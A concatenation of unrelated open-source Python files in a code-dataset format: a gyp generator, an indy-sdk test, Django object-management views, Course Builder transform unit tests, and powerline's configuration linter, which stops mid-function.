]

# gypd doesn't define a default value for OS like many other generator
# modules. Specify "-D OS=whatever" on the command line to provide a value.
generator_default_variables = {
}

# gypd supports multiple toolsets
generator_supports_multiple_toolsets = True

# TODO(mark): This always uses <, which isn't right. The input module should
# notify the generator to tell it which phase it is operating in, and this
# module should use < for the early phase and then switch to > for the late
# phase. Bonus points for carrying @ back into the output too.
# Map each identity variable to an early-expansion reference to itself.
for v in _generator_identity_variables:
  generator_default_variables[v] = '<(%s)' % v
def GenerateOutput(target_list, target_dicts, data, params):
  """Write one pretty-printed .gypd file per input .gyp file.

  Args follow the standard gyp generator interface.  Each qualified
  target whose source file ends in '.gyp' contributes one output file
  named <stem><suffix>.gypd containing the pprint'ed input data for
  that file.
  """
  output_files = {}
  for qualified_target in target_list:
    [input_file, target] = \
        gyp.common.ParseQualifiedTarget(qualified_target)[0:2]
    if input_file[-4:] != '.gyp':
      continue
    input_file_stem = input_file[:-4]
    output_file = input_file_stem + params['options'].suffix + '.gypd'
    # Several targets share one .gyp; emit each output file only once.
    if output_file not in output_files:
      output_files[output_file] = input_file

  for output_file, input_file in output_files.items():
    # items() instead of Python-2-only iteritems() keeps this runnable
    # on both Python 2 and 3; `with` guarantees the file is closed.
    with open(output_file, 'w') as output:
      pprint.pprint(data[input_file], output)
|
srottem/indy-sdk | refs/heads/master | wrappers/python/tests/pool/test_create_pool_ledger_config.py | 3 | import pytest
from indy import pool
from indy.error import ErrorCode, IndyError
@pytest.mark.asyncio
async def test_create_pool_ledger_config_works(pool_ledger_config):
    # The pool_ledger_config fixture performs the actual config creation;
    # this test passes as long as the fixture sets up without raising.
    pass
@pytest.mark.asyncio
async def test_create_pool_ledger_config_works_for_empty_name():
    # An empty config name must be rejected with CommonInvalidParam2
    # (the second parameter of the C API call is the name).
    with pytest.raises(IndyError) as e:
        await pool.create_pool_ledger_config("", None)
    assert ErrorCode.CommonInvalidParam2 == e.value.error_code
|
weijia/obj_sys | refs/heads/master | obj_sys/views.py | 1 | # Create your views here.
from obj_tagging import *
from obj_operator import ObjOperator, ObjListOperator, handle_operation_request
from djangoautoconf.django_utils import retrieve_param
from models import UfsObj
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect
log = logging.getLogger(__name__)
@login_required
def manager(request):
    """Render the object manager page with the left-hand jstree panel."""
    # NOTE(review): `data` is unused below; retrieve_param may be called
    # for side effects -- confirm before removing.
    data = retrieve_param(request)
    c = {"user": request.user, "tree": {"name": "left_tree", "url": "/custom_collections/jstree/?node="}}
    # Add the CSRF token required by the template's forms.
    c.update(csrf(request))
    return render_to_response('obj_sys/manager.html', c)
def query(request):
    """Render the object query page for the current user."""
    # Start from the CSRF context and add the user; equivalent to
    # building {'user': ...} and update()-ing the CSRF token in.
    context = dict(csrf(request))
    context["user"] = request.user
    return render_to_response('obj_sys/query.html', context)
def get_parent(request):
    """Return (as JSON) the ufs_url of the parent of the object named by
    the `ufs_url` request parameter, in a tastypie-style envelope."""
    ufs_url = retrieve_param(request)["ufs_url"]
    res = {"meta": {"limit": 20, "next": None, "offset": 0, "previous": None, "total_count": 1},
           "objects": [{"parent": UfsObj.objects.get(ufs_url=ufs_url).parent.ufs_url}]}
    return JsonResponse(res)
def rm_objects_for_path(request):
    """Delete every UfsObj whose ufs_url starts with the given prefix.

    Responds with (up to) the first 100 full paths of matched objects
    as feedback.  If no `ufs_url` parameter is supplied, nothing is
    deleted and an empty list is returned.
    """
    data = retrieve_param(request)
    cnt = 0
    # BUG FIX: `res` was only bound inside the `if`, so a request without
    # a `ufs_url` parameter raised NameError at the return below.
    res = []
    if "ufs_url" in data:
        prefix = data["ufs_url"]
        # Normalize to a directory-style prefix so "a/b" cannot match "a/bc".
        if prefix[-1] != "/":
            prefix += "/"
        for i in UfsObj.objects.filter(ufs_url__startswith=prefix):
            if cnt < 100:
                res.append(i.full_path)
            else:
                break
            cnt += 1
        #Remove tags first?
        #TaggedItem.objects.filter(object__ufs_url__startswith=data["ufs_url"]).delete()
        UfsObj.objects.filter(ufs_url__startswith=prefix).delete()
    return HttpResponse(res, mimetype="application/json")
@login_required
def listing_with_description(request):
    """List the current user's valid objects of the requested type
    (request parameter `type`, default "1"), newest first."""
    data = retrieve_param(request)
    ufs_obj_type = int(data.get("type", "1"))
    objects = UfsObj.objects.filter(user=request.user, valid=True, ufs_obj_type=ufs_obj_type).order_by('-last_modified')
    return render_to_response('obj_sys/listing_with_description_in_bootstrap.html',
                              {"objects": objects, "request": request, "title": "My bookmarks",
                               "email": "richardwangwang@gmail.com", "author": "Richard"},
                              context_instance=RequestContext(request))
@login_required
def do_operation(request):
    """Run a named ObjOperator command against one object, then redirect.

    Expects `cmd` (a method name on ObjOperator) and `pk` (object primary
    key).  All remaining request parameters are forwarded to the redirect
    target (`next_url`, default /obj_sys/homepage/) as query parameters.
    """
    data = retrieve_param(request)
    if ("cmd" in data) and ("pk" in data):
        operator = ObjOperator(int(data["pk"]))
        getattr(operator, data["cmd"])()
    next_url = "/obj_sys/homepage/"
    if "next_url" in data:
        next_url = data["next_url"]
    # BUG FIX: forwarded parameters were always appended with '&', which
    # produced an invalid URL when next_url had no query string yet.
    sep = '&' if '?' in next_url else '?'
    for param in data:
        if param not in ["cmd", "pk", "next_url"]:
            next_url += "%s%s=%s" % (sep, param, data[param])
            sep = '&'
    return HttpResponseRedirect(next_url)
@login_required
def do_json_operation(request):
    """Delegate JSON operation requests to obj_operator's handler."""
    return handle_operation_request(request)
CSCI1200Course/csci1200OnlineCourse | refs/heads/master | tests/unit/models_transforms.py | 5 | # Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for the transforms functions."""
__author__ = 'John Orr (jorr@google.com)'
import datetime
import unittest
from models import transforms
def wrap_properties(properties):
    """Wrap a property dict in the schema envelope json_to_dict expects."""
    return dict(properties=properties)
class JsonToDictTests(unittest.TestCase):
    """Exercise transforms.json_to_dict: schema-driven conversion of a
    JSON-ish dict into typed Python values (bool, number, date, datetime),
    including rejection of malformed values and handling of None."""

    def test_missing_optional_fields_are_allowed(self):
        schema = wrap_properties(
            {'opt_field': {'type': 'boolean', 'optional': 'true'}})
        result = transforms.json_to_dict({}, schema)
        self.assertEqual(len(result), 0)

    def test_missing_required_fields_are_rejected(self):
        schema = wrap_properties(
            {'req_field': {'type': 'boolean', 'optional': 'false'}})
        try:
            transforms.json_to_dict({}, schema)
            self.fail('Expected ValueError')
        except ValueError as e:
            self.assertEqual(str(e), 'Missing required attribute: req_field')
        # Fields are required by default when 'optional' is absent.
        schema = wrap_properties(
            {'req_field': {'type': 'boolean'}})
        try:
            transforms.json_to_dict({}, schema)
            self.fail('Expected ValueError')
        except ValueError as e:
            self.assertEqual(str(e), 'Missing required attribute: req_field')

    def test_convert_boolean(self):
        schema = wrap_properties({'field': {'type': 'boolean'}})
        source = {'field': True}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(result['field'], True)

    def test_convert_string_to_boolean(self):
        schema = wrap_properties({'field': {'type': 'boolean'}})
        source = {'field': 'true'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(result['field'], True)

    def test_reject_bad_boolean(self):
        schema = wrap_properties({'field': {'type': 'boolean'}})
        source = {'field': 'cat'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            self.assertEqual(str(e), 'Bad boolean value for field: cat')

    def test_convert_number(self):
        schema = wrap_properties({'field': {'type': 'number'}})
        source = {'field': 3.14}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(result['field'], 3.14)

    def test_convert_string_to_number(self):
        schema = wrap_properties({'field': {'type': 'number'}})
        source = {'field': '3.14'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(result['field'], 3.14)

    def test_reject_bad_number(self):
        schema = wrap_properties({'field': {'type': 'number'}})
        source = {'field': 'cat'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            # Message comes straight from float('cat').
            self.assertEqual(str(e), 'could not convert string to float: cat')

    def test_convert_date(self):
        schema = wrap_properties({'field': {'type': 'date'}})
        # Both '/' and '-' separators are accepted.
        source = {'field': '2005/03/01'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(result['field'], datetime.date(2005, 3, 1))
        source = {'field': '2005-03-01'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(result['field'], datetime.date(2005, 3, 1))

    def test_reject_bad_dates(self):
        schema = wrap_properties({'field': {'type': 'date'}})
        # Well-formed but impossible date.
        source = {'field': '2005/02/31'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            self.assertEqual(str(e), 'day is out of range for month')
        # Not a date at all.
        schema = wrap_properties({'field': {'type': 'date'}})
        source = {'field': 'cat'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            self.assertEqual(
                str(e), 'time data \'cat\' does not match format \'%s\'' %
                transforms.ISO_8601_DATE_FORMAT)

    def test_convert_datetime(self):
        schema = wrap_properties({'field': {'type': 'datetime'}})
        # Several accepted shapes: with/without seconds, trailing 'Z',
        # and full ISO-8601 with microseconds.
        source = {'field': '2005/03/01 20:30'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(len(result), 1)
        self.assertEqual(
            result['field'], datetime.datetime(2005, 3, 1, 20, 30, 0))
        source = {'field': '2005-03-01 20:30:19'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(
            result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19))
        source = {'field': '2005-03-01 20:30:19Z'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(
            result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19))
        source = {'field': '2005-03-01T20:30:19.123456Z'}
        result = transforms.json_to_dict(source, schema)
        self.assertEqual(
            result['field'], datetime.datetime(2005, 3, 1, 20, 30, 19, 123456))

    def test_reject_bad_datetimes(self):
        schema = wrap_properties({'field': {'type': 'datetime'}})
        source = {'field': '2005/02/31 20:30'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            self.assertEqual(str(e), 'day is out of range for month')
        schema = wrap_properties({'field': {'type': 'datetime'}})
        source = {'field': 'cat'}
        try:
            transforms.json_to_dict(source, schema)
            self.fail('Expected ValueException')
        except ValueError as e:
            self.assertEqual(
                str(e),
                'time data \'cat\' does not match format \'%s\'' %
                transforms.ISO_8601_DATETIME_FORMAT)

    def test_nulls(self):
        # With permit_none_values=True, None passes through for every
        # supported JSON type.
        for type_name in transforms.JSON_TYPES:
            schema = wrap_properties({'field': {'type': type_name}})
            source = {'field': None}
            ret = transforms.json_to_dict(source, schema,
                                          permit_none_values=True)
            self.assertIn('field', ret)
            self.assertIsNone(ret['field'])
class StringValueConversionTests(unittest.TestCase):
    """Exercise the value<->string helpers used for property storage."""

    def test_value_to_string(self):
        assert transforms.value_to_string(True, bool) == 'True'
        assert transforms.value_to_string(False, bool) == 'False'
        # None is rendered as the type's falsy string.
        assert transforms.value_to_string(None, bool) == 'False'

    def test_string_to_value(self):
        # Only 'True' and '1' (or the int 1) parse as True ...
        assert transforms.string_to_value('True', bool)
        assert transforms.string_to_value('1', bool)
        assert transforms.string_to_value(1, bool)
        # ... everything else, including other numerals, is False.
        assert not transforms.string_to_value('False', bool)
        assert not transforms.string_to_value('0', bool)
        assert not transforms.string_to_value('5', bool)
        assert not transforms.string_to_value(0, bool)
        assert not transforms.string_to_value(5, bool)
        assert not transforms.string_to_value(None, bool)
        assert transforms.string_to_value('15', int) == 15
        assert transforms.string_to_value(15, int) == 15
        # None maps to the type's zero value.
        assert transforms.string_to_value(None, int) == 0
        assert transforms.string_to_value('foo', str) == 'foo'
        assert transforms.string_to_value(None, str) == str('')
class JsonParsingTests(unittest.TestCase):
    """Exercise transforms.loads strict/non-strict JSON parsing."""

    def test_json_trailing_comma_in_dict_fails(self):
        # Strict (default) parsing rejects trailing commas in objects.
        json_text = '{"foo": "bar",}'
        try:
            transforms.loads(json_text)
            raise Exception('Expected to fail')
        except ValueError:
            pass

    def test_json_trailing_comma_in_array_fails(self):
        # Strict parsing also rejects trailing commas in arrays.
        json_text = '{"foo": ["bar",]}'
        try:
            transforms.loads(json_text)
            raise Exception('Expected to fail')
        except ValueError:
            pass

    def test_non_strict_mode_parses_json(self):
        # strict=False tolerates trailing commas in both positions.
        json_text = '{"foo": "bar", "baz": ["bum",],}'
        _json = transforms.loads(json_text, strict=False)
        assert _json.get('foo') == 'bar'
|
S0lll0s/powerline | refs/heads/develop | powerline/lint/checks.py | 17 | # vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
import re
import logging
from collections import defaultdict
from powerline.lib.threaded import ThreadedSegment
from powerline.lib.unicode import unicode
from powerline.lint.markedjson.markedvalue import MarkedUnicode
from powerline.lint.markedjson.error import DelayedEchoErr, Mark
from powerline.lint.selfcheck import havemarks
from powerline.lint.context import JStr, list_themes
from powerline.lint.imp import WithPath, import_function, import_segment
from powerline.lint.spec import Spec
from powerline.lint.inspect import getconfigargspec
# Separator used when joining name lists in error messages.
list_sep = JStr(', ')

# Keys valid in any segment dictionary regardless of the segment type.
generic_keys = set((
    'exclude_modes', 'include_modes',
    'exclude_function', 'include_function',
    'width', 'align',
    'name',
    'draw_soft_divider', 'draw_hard_divider',
    'priority',
    'after', 'before',
    'display'
))
# Additional keys allowed only for a specific segment type.
type_keys = {
    'function': set(('function', 'args', 'draw_inner_divider')),
    'string': set(('contents', 'type', 'highlight_groups', 'divider_highlight_group')),
    'segment_list': set(('function', 'segments', 'args', 'type')),
}
# Keys that must be present for a given segment type.
required_keys = {
    'function': set(('function',)),
    'string': set(()),
    'segment_list': set(('function', 'segments',)),
}
# At least one of these is needed to resolve a non-function segment's
# highlight group.
highlight_keys = set(('highlight_groups', 'name'))
def get_function_strings(function_name, context, ext):
    '''Split a segment function name into its (module, function) parts.

    A dotted name carries its own module.  A bare name takes the module from
    the theme's ``default_module`` key, falling back to
    ``powerline.segments.<ext>``.
    '''
    if '.' not in function_name:
        fallback = MarkedUnicode('powerline.segments.' + ext, None)
        return context[0][1].get('default_module', fallback), function_name
    module, _, short_name = function_name.rpartition('.')
    return module, short_name
def check_matcher_func(ext, match_name, data, context, echoerr):
    '''Check that a local-theme matcher function can be imported and called.

    Returns the usual (proceed, echoed, hadproblem) triple.
    '''
    havemarks(match_name)
    # Extra user-configured import roots from common.paths.
    import_paths = [os.path.expanduser(path) for path in context[0][1].get('common', {}).get('paths', [])]

    match_module, separator, match_function = match_name.rpartition('.')
    if not separator:
        # A bare name resolves inside the stock matcher package for ext.
        match_module = 'powerline.matchers.{0}'.format(ext)
        match_function = match_name
    with WithPath(import_paths):
        try:
            func = getattr(__import__(str(match_module), fromlist=[str(match_function)]), str(match_function))
        except ImportError:
            echoerr(context='Error while loading matcher functions',
                    problem='failed to load module {0}'.format(match_module),
                    problem_mark=match_name.mark)
            return True, False, True
        except AttributeError:
            echoerr(context='Error while loading matcher functions',
                    problem='failed to load matcher function {0}'.format(match_function),
                    problem_mark=match_name.mark)
            return True, False, True

    if not callable(func):
        echoerr(context='Error while loading matcher functions',
                problem='loaded “function” {0} is not callable'.format(match_function),
                problem_mark=match_name.mark)
        return True, False, True

    # NOTE(review): func_code is the Python-2 attribute name; on Python 3
    # (``__code__``) this check is silently skipped -- presumably acceptable
    # since it is only an advisory arity check.  Confirm intent.
    if hasattr(func, 'func_code') and hasattr(func.func_code, 'co_argcount'):
        if func.func_code.co_argcount != 1:
            echoerr(
                context='Error while loading matcher functions',
                problem=(
                    'function {0} accepts {1} arguments instead of 1. '
                    'Are you sure it is the proper function?'
                ).format(match_function, func.func_code.co_argcount),
                problem_mark=match_name.mark
            )

    # An arity mismatch is reported above but deliberately not counted as a
    # problem in the returned triple.
    return True, False, False
def check_ext(ext, data, context, echoerr):
    '''Check that configuration exists for extension *ext*.

    Returns (hadsomedirs, hadproblem): whether at least one themes or
    colorschemes source was found, and whether any error was reported.
    '''
    havemarks(ext)
    hadsomedirs = False
    hadproblem = False
    if ext not in data['lists']['exts']:
        echoerr(context='Error while loading {0} extension configuration'.format(ext),
                context_mark=ext.mark,
                problem='extension configuration does not exist')
        return hadsomedirs, True
    for typ in ('themes', 'colorschemes'):
        if ext in data['configs'][typ] or data['configs']['top_' + typ]:
            hadsomedirs = True
        else:
            hadproblem = True
            echoerr(context='Error while loading {0} extension configuration'.format(ext),
                    context_mark=ext.mark,
                    problem='{0} configuration does not exist'.format(typ))
    return hadsomedirs, hadproblem
def check_config(d, theme, data, context, echoerr):
    '''Check that configuration file *theme* of kind *d* exists for the
    extension named in *context*.
    '''
    # The extension key sits two levels up for regular themes and three
    # levels up when checking local_themes.
    ext = context[-2][0] if len(context) == 4 else context[-3][0]
    if ext not in data['lists']['exts']:
        echoerr(context='Error while loading {0} extension configuration'.format(ext),
                context_mark=ext.mark,
                problem='extension configuration does not exist')
        return True, False, True
    ext_has_theme = ext in data['configs'][d] and theme in data['configs'][d][ext]
    if not ext_has_theme and theme not in data['configs']['top_' + d]:
        echoerr(context='Error while loading {0} from {1} extension configuration'.format(d[:-1], ext),
                problem='failed to find configuration file {0}/{1}/{2}.json'.format(d, ext, theme),
                problem_mark=theme.mark)
        return True, False, True
    return True, False, False
def check_top_theme(theme, data, context, echoerr):
    '''Check that *theme* names an existing top-level theme.'''
    havemarks(theme)
    if theme in data['configs']['top_themes']:
        return True, False, False
    echoerr(context='Error while checking extension configuration (key {key})'.format(key=context.key),
            context_mark=context[-2][0].mark,
            problem='failed to find top theme {0}'.format(theme),
            problem_mark=theme.mark)
    return True, False, True
def check_color(color, data, context, echoerr):
    '''Check that *color* names a defined color or gradient.'''
    havemarks(color)
    known = (color in data['colors_config'].get('colors', {})
             or color in data['colors_config'].get('gradients', {}))
    if known:
        return True, False, False
    echoerr(
        context='Error while checking highlight group in colorscheme (key {key})'.format(
            key=context.key),
        problem='found unexistent color or gradient {0}'.format(color),
        problem_mark=color.mark
    )
    return True, False, True
def check_translated_group_name(group, data, context, echoerr):
    # Translated group names obey exactly the same resolution rules as plain
    # group names, so simply delegate.
    return check_group(group, data, context, echoerr)
def check_group(group, data, context, echoerr):
    '''Check that *group* resolves to a full group definition in all relevant
    colorschemes (following string aliases recursively).

    Returns the usual (proceed, echoed, hadproblem) triple.
    '''
    havemarks(group)
    if not isinstance(group, unicode):
        # Non-string definitions (actual fg/bg dicts) are checked elsewhere.
        return True, False, False
    colorscheme = data['colorscheme']
    ext = data['ext']
    # BUG FIX: start from an empty list instead of None.  Previously, when
    # the top-level colorscheme lookup below raised KeyError, ``configs``
    # stayed None and the ``for new_colorscheme, config_lst in configs`` loop
    # crashed with TypeError.
    configs = []
    if ext:
        def listed_key(d, k):
            # Wrap a single lookup into a 0/1-element list.
            try:
                return [d[k]]
            except KeyError:
                return []

        if colorscheme == '__main__':
            # __main__ groups must resolve in every named colorscheme.
            colorscheme_names = set(data['ext_colorscheme_configs'][ext])
            colorscheme_names.update(data['top_colorscheme_configs'])
            colorscheme_names.discard('__main__')
            configs = [
                (
                    name,
                    listed_key(data['ext_colorscheme_configs'][ext], name)
                    + listed_key(data['ext_colorscheme_configs'][ext], '__main__')
                    + listed_key(data['top_colorscheme_configs'], name)
                )
                for name in colorscheme_names
            ]
        else:
            configs = [
                (
                    colorscheme,
                    listed_key(data['ext_colorscheme_configs'][ext], colorscheme)
                    + listed_key(data['ext_colorscheme_configs'][ext], '__main__')
                    + listed_key(data['top_colorscheme_configs'], colorscheme)
                )
            ]
    else:
        try:
            configs = [(colorscheme, [data['top_colorscheme_configs'][colorscheme]])]
        except KeyError:
            pass
    hadproblem = False
    for new_colorscheme, config_lst in configs:
        not_found = []
        new_data = data.copy()
        new_data['colorscheme'] = new_colorscheme
        for config in config_lst:
            havemarks(config)
            try:
                group_data = config['groups'][group]
            except KeyError:
                not_found.append(config.mark.name)
            else:
                # The referenced definition may itself be an alias; recurse.
                proceed, echo, chadproblem = check_group(
                    group_data,
                    new_data,
                    context,
                    echoerr,
                )
                if chadproblem:
                    hadproblem = True
                if not proceed:
                    break
        # Only complain when the group was found in none of the candidates.
        if not_found and len(not_found) == len(config_lst):
            echoerr(
                context='Error while checking group definition in colorscheme (key {key})'.format(
                    key=context.key),
                problem='name {0} is not present anywhere in {1} {2} {3} colorschemes: {4}'.format(
                    group, len(not_found), ext, new_colorscheme, ', '.join(not_found)),
                problem_mark=group.mark
            )
            hadproblem = True
    return True, False, hadproblem
def check_key_compatibility(segment, data, context, echoerr):
    '''Check that the keys of *segment* are consistent with its type.

    Reports unknown keys, missing required keys, and a missing highlight
    group source for non-function segments.
    '''
    havemarks(segment)
    segment_type = segment.get('type', MarkedUnicode('function', None))
    havemarks(segment_type)

    if segment_type not in type_keys:
        echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
                problem='found segment with unknown type {0}'.format(segment_type),
                problem_mark=segment_type.mark)
        return False, False, True

    hadproblem = False

    keys = set(segment)
    # BUG FIX: use subset-or-equal (<=) rather than strict subset (<).  With
    # strict subset, a segment specifying exactly the allowed type keys was
    # flagged as erroneous and then crashed with IndexError because
    # ``unknown_keys`` was empty when taking list(unknown_keys)[0].
    if not ((keys - generic_keys) <= type_keys[segment_type]):
        unknown_keys = keys - generic_keys - type_keys[segment_type]
        echoerr(
            context='Error while checking segments (key {key})'.format(key=context.key),
            context_mark=context[-1][1].mark,
            problem='found keys not used with the current segment type: {0}'.format(
                list_sep.join(unknown_keys)),
            problem_mark=list(unknown_keys)[0].mark
        )
        hadproblem = True

    if not (keys >= required_keys[segment_type]):
        missing_keys = required_keys[segment_type] - keys
        echoerr(
            context='Error while checking segments (key {key})'.format(key=context.key),
            context_mark=context[-1][1].mark,
            problem='found missing required keys: {0}'.format(
                list_sep.join(missing_keys))
        )
        hadproblem = True

    # Function segments derive their highlight group from the function name;
    # all other types need an explicit highlight_groups or name key.
    if not (segment_type == 'function' or (keys & highlight_keys)):
        echoerr(
            context='Error while checking segments (key {key})'.format(key=context.key),
            context_mark=context[-1][1].mark,
            problem=(
                'found missing keys required to determine highlight group. '
                'Either highlight_groups or name key must be present'
            )
        )
        hadproblem = True

    return True, False, hadproblem
def check_segment_module(module, data, context, echoerr):
    '''Check that the segment *module* can be imported.'''
    havemarks(module)
    hadproblem = False
    with WithPath(data['import_paths']):
        try:
            __import__(str(module))
        except ImportError as exc:
            # Show the traceback only when debug logging is enabled.
            if echoerr.logger.level >= logging.DEBUG:
                echoerr.logger.exception(exc)
            echoerr(context='Error while checking segments (key {key})'.format(key=context.key),
                    problem='failed to import module {0}'.format(module),
                    problem_mark=module.mark)
            hadproblem = True
    return True, False, hadproblem
def check_full_segment_data(segment, data, context, echoerr):
    '''Merge theme-level segment_data into *segment* and re-check its keys.

    segment_data entries matching the segment's name or (module-qualified)
    function name can provide before/after/args/contents defaults.
    '''
    if 'name' not in segment and 'function' not in segment:
        return True, False, False

    ext = data['ext']
    theme_segment_data = context[0][1].get('segment_data', {})
    main_theme_name = data['main_config'].get('ext', {}).get(ext, {}).get('theme', None)
    if not main_theme_name or data['theme'] == main_theme_name:
        top_segment_data = {}
    else:
        # Non-default themes also inherit segment_data from the main theme.
        top_segment_data = data['ext_theme_configs'].get(main_theme_name, {}).get('segment_data', {})

    if segment.get('type', 'function') == 'function':
        function_name = segment.get('function')
        if function_name:
            module, function_name = get_function_strings(function_name, context, ext)
            # Both the qualified and the bare name may key segment_data.
            names = [module + '.' + function_name, function_name]
        else:
            names = []
    elif segment.get('name'):
        names = [segment['name']]
    else:
        return True, False, False

    segment_copy = segment.copy()

    for key in ('before', 'after', 'args', 'contents'):
        if key not in segment_copy:
            for segment_data in [theme_segment_data, top_segment_data]:
                for name in names:
                    try:
                        val = segment_data[name][key]
                        # keydict preserves the marked key object so error
                        # marks keep pointing at the original config file.
                        k = segment_data[name].keydict[key]
                        segment_copy[k] = val
                    except KeyError:
                        pass

    return check_key_compatibility(segment_copy, data, context, echoerr)
# Spec factory for a valid highlight group identifier; the private copy adds
# the context message used when validating groups parsed out of segment
# function docstrings.
highlight_group_spec = Spec().ident().copy
_highlight_group_spec = highlight_group_spec().context_message(
    'Error while checking function documentation while checking theme (key {key})')
def check_hl_group_name(hl_group, context_mark, context, echoerr):
    '''Check highlight group name: it should match naming conventions

    :param str hl_group:
        Checked group.
    :param Mark context_mark:
        Context mark. May be ``None``.
    :param Context context:
        Current context.
    :param func echoerr:
        Function used for error reporting.

    :return: ``False`` if check succeeded and ``True`` if it failed.
    '''
    # Spec.match returns (proceed, hadproblem); only hadproblem matters here.
    return _highlight_group_spec.match(hl_group, context_mark=context_mark, context=context, echoerr=echoerr)[1]
def check_segment_function(function_name, data, context, echoerr):
    '''Check a segment's function reference.

    For function-type segments the function is imported and its docstring is
    parsed for "Highlight groups used:", "Divider highlight group used:" and
    "No highlight groups are used" sentences; every mentioned group must
    exist in all colorschemes.  For other segment types the name is only
    checked against known segment_data entries.
    '''
    havemarks(function_name)
    ext = data['ext']
    module, function_name = get_function_strings(function_name, context, ext)
    if context[-2][1].get('type', 'function') == 'function':
        func = import_segment(function_name, data, context, echoerr, module=module)

        if not func:
            return True, False, True

        hl_groups = []
        divider_hl_group = None

        hadproblem = False

        if func.__doc__:
            # These literal sentences are the documented contract between
            # segment docstrings and the linter.
            NO_H_G_USED_STR = 'No highlight groups are used (literal segment).'
            H_G_USED_STR = 'Highlight groups used: '
            LHGUS = len(H_G_USED_STR)
            D_H_G_USED_STR = 'Divider highlight group used: '
            LDHGUS = len(D_H_G_USED_STR)
            pointer = 0  # running byte offset into the docstring, for marks
            mark_name = '<{0} docstring>'.format(function_name)
            for i, line in enumerate(func.__doc__.split('\n')):
                if H_G_USED_STR in line:
                    idx = line.index(H_G_USED_STR) + LHGUS
                    if hl_groups is None:
                        # Docstring already said "no groups used": conflict.
                        idx -= LHGUS
                        mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
                        echoerr(
                            context='Error while checking theme (key {key})'.format(key=context.key),
                            context_mark=function_name.mark,
                            problem=(
                                'found highlight group definition in addition to sentense stating that '
                                'no highlight groups are used'
                            ),
                            problem_mark=mark,
                        )
                        hadproblem = True
                        continue
                    hl_groups.append((
                        line[idx:],
                        (mark_name, i + 1, idx + 1, func.__doc__),
                        pointer + idx
                    ))
                elif D_H_G_USED_STR in line:
                    # +2 / -3 skip the `` quoting around the group name;
                    # assumes the documented ``group`` format -- see the
                    # regexp used for ordinary groups below.
                    idx = line.index(D_H_G_USED_STR) + LDHGUS + 2
                    mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
                    divider_hl_group = MarkedUnicode(line[idx:-3], mark)
                elif NO_H_G_USED_STR in line:
                    idx = line.index(NO_H_G_USED_STR)
                    if hl_groups:
                        # Groups were already listed: conflicting statements.
                        mark = Mark(mark_name, i + 1, idx + 1, func.__doc__, pointer + idx)
                        echoerr(
                            context='Error while checking theme (key {key})'.format(key=context.key),
                            context_mark=function_name.mark,
                            problem=(
                                'found sentense stating that no highlight groups are used '
                                'in addition to highlight group definition'
                            ),
                            problem_mark=mark,
                        )
                        hadproblem = True
                        continue
                    # None is the sentinel for "explicitly uses no groups".
                    hl_groups = None
                pointer += len(line) + len('\n')

        if divider_hl_group:
            r = hl_exists(divider_hl_group, data, context, echoerr, allow_gradients=True)
            if r:
                echoerr(
                    context='Error while checking theme (key {key})'.format(key=context.key),
                    context_mark=function_name.mark,
                    problem=(
                        'found highlight group {0} not defined in the following colorschemes: {1}\n'
                        '(Group name was obtained from function documentation.)'
                    ).format(divider_hl_group, list_sep.join(r)),
                    problem_mark=divider_hl_group.mark,
                )
                hadproblem = True
            if check_hl_group_name(divider_hl_group, function_name.mark, context, echoerr):
                hadproblem = True

        if hl_groups:
            # Lines look like "``group`` or ``fallback`` (gradient), ``other``".
            greg = re.compile(r'``([^`]+)``( \(gradient\))?')
            parsed_hl_groups = []
            for line, mark_args, pointer in hl_groups:
                for s in line.split(', '):
                    required_pack = []
                    sub_pointer = pointer
                    for subs in s.split(' or '):
                        match = greg.match(subs)
                        try:
                            if not match:
                                continue
                            hl_group = MarkedUnicode(
                                match.group(1),
                                Mark(*mark_args, pointer=sub_pointer + match.start(1))
                            )
                            if check_hl_group_name(hl_group, function_name.mark, context, echoerr):
                                hadproblem = True
                            gradient = bool(match.group(2))
                            required_pack.append((hl_group, gradient))
                        finally:
                            sub_pointer += len(subs) + len(' or ')
                    parsed_hl_groups.append(required_pack)
                    pointer += len(s) + len(', ')
            del hl_group, gradient
            for required_pack in parsed_hl_groups:
                # Each pack is a list of alternatives; the error only fires
                # when every alternative is missing somewhere.
                rs = [
                    hl_exists(hl_group, data, context, echoerr, allow_gradients=('force' if gradient else False))
                    for hl_group, gradient in required_pack
                ]
                if all(rs):
                    echoerr(
                        context='Error while checking theme (key {key})'.format(key=context.key),
                        problem=(
                            'found highlight groups list ({0}) with all groups not defined in some colorschemes\n'
                            '(Group names were taken from function documentation.)'
                        ).format(list_sep.join((h[0] for h in required_pack))),
                        problem_mark=function_name.mark
                    )
